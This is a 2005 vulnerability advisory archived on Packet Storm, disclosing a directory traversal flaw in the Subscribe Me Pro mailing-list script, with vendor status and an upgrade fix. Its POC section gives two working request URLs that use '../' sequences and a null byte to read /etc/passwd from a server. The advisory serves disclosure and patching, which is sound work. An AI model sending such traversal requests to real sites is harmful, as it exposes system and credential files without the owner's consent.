what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

subpro204409P.txt

subpro204409P.txt
Posted Sep 14, 2005
Authored by h4cky0u, ShoCK FX | Site h4cky0u.org

Subscribe Me Pro versions 2.044.09P and below are prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter.

tags | exploit, arbitrary
SHA-256 | 5e76584f9eb98cc32891dee8d34295a44662addf60ae2c5e75c2d9c2cde99878

subpro204409P.txt

Change Mirror Download
------=_Part_563_26909740.1126618894612
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

------------------------------------------------------
HYA-2005-006 h4cky0u.org <http://h4cky0u.org> Advisory 007
------------------------------------------------------
Date - Tue Sep 13 2005


TITLE:
=3D=3D=3D=3D=3D=3D

Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability


SEVERITY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D

High


SOFTWARE:
=3D=3D=3D=3D=3D=3D=3D=3D=3D

Subscribe Me Pro 2.044.09P and prior

Support Website : http://siteinteractive.com/subpro/


INFO:
=3D=3D=3D=3D=3D

Subscribe Me Professional is designed to assist with the building,=20
maintaining, mailing, and tracking of your customer/prospect mailing lists.


BUG DESCRIPTION:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal=20
vulnerability. This issue is due to a failure in the application to properl=
y=20
sanitize user-supplied input. An unauthorized user can retrieve arbitrary=
=20
files by supplying directory traversal strings '../' to the vulnerable=20
parameter.


POC:
=3D=3D=3D=3D

Here are some examples:

http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscribe&l=3D../../../../=
../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%20%20

http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20address%20here&su=
bscribe=3Dsubscribe&l=3D../../../../../../../../etc/passwd%00


VENDOR STATUS:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the=20
Latest Release : 2.050.01P


FIX:
=3D=3D=3D=3D

Upgrade to version 2.050.01P


CREDITS:
=3D=3D=3D=3D=3D=3D=3D=3D

This vulnerability was discovered and researched by -

ShoCK FX of h4cky0u Security Forums.


mail : shockfx at gmail dot com

web : http://www.h4cky0u.org


Co Researcher -

h4cky0u of h4cky0u Security Forums.


mail : h4cky0u at gmail dot com

web : http://www.h4cky0u.org


ORIGINAL ADVISORY:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt
--=20
http://www.h4cky0u.org
(In)Security at its best...

------=_Part_563_26909740.1126618894612
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<div><span class=3D"gmail_quote">
<p>------------------------------------------------------<br>&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp; HYA-2005-006 <a href=3D"http://h4cky0u.org">h4cky0u.org</a=
> Advisory 007<br>------------------------------------------------------<br=
>Date - Tue Sep 13 2005
</p>
<p><br>TITLE:<br>=3D=3D=3D=3D=3D=3D</p>
<p>Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability</=
p>
<p><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>High</p>
<p><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>Subscribe Me Pro 2.044.09P and prior</p>
<p>Support Website : <a href=3D"http://siteinteractive.com/subpro/">http://=
siteinteractive.com/subpro/</a></p>
<p><br>INFO:<br>=3D=3D=3D=3D=3D</p>
<p>Subscribe Me Professional is designed to assist with the building, maint=
aining, mailing, and tracking of your customer/prospect mailing lists.</p>
<p><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
</p>
<p>Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal =
vulnerability. This issue is due to a failure in the application to properl=
y sanitize user-supplied input. An unauthorized user can retrieve arbitrary=
files by supplying directory traversal strings '../' to the vulnerable par=
ameter.
</p>
<p><br>POC:<br>=3D=3D=3D=3D</p>
<p>Here are some examples:</p>
<p><a href=3D"http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscrib=
e&l=3D../../../../../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%2=
0%20">http://www.site.com/[dir]/s.pl?e=3D1&subscribe=3Dsubscribe&l=
=3D../../../../../../../../etc/passwd%00&SUBMIT=3D%20%20Submit%20%20
</a></p>
<p><a href=3D"http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20add=
ress%20here&subscribe=3Dsubscribe&l=3D../../../../../../../../etc/p=
asswd%00">http://www.site.com/[dir]/s.pl?e=3Denter%20your%20email%20address=
%20here&subscribe=3Dsubscribe&l=3D../../../../../../../../etc/passw=
d%00
</a></p>
<p><br>VENDOR STATUS:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>Vendor Contact : 13th Sep 2005<br>Vendor Reply : 13th sep 2005 - This Vu=
lnerability has been fixed in the Latest Release : 2.050.01P</p>
<p><br>FIX:<br>=3D=3D=3D=3D</p>
<p>Upgrade to version 2.050.01P</p>
<p><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D</p>
<p>This vulnerability was discovered and researched by -</p>
<p>ShoCK FX of h4cky0u Security Forums.</p>
<p><br>mail : shockfx at gmail dot com</p>
<p>web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p><br>Co Researcher -</p>
<p>h4cky0u of h4cky0u Security Forums.</p>
<p><br>mail : h4cky0u at gmail dot com</p>
<p>web : <a href=3D"http://www.h4cky0u.org/">http://www.h4cky0u.org</a></p>
<p><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D</p>
<p><a href=3D"http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-p=
ro.txt">http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt=
</a></p></span>-- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u=
.org
</a><br>(In)Security at its best... </div>

------=_Part_563_26909740.1126618894612--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close